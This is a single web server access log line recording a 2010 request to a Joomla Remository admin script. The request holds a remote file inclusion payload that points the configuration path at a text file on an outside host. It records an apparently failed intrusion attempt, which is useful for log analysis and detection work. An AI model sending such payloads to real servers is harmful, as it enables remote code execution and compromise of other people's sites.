66.113.99.66 - - [20/Apr/2010:03:21:15 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
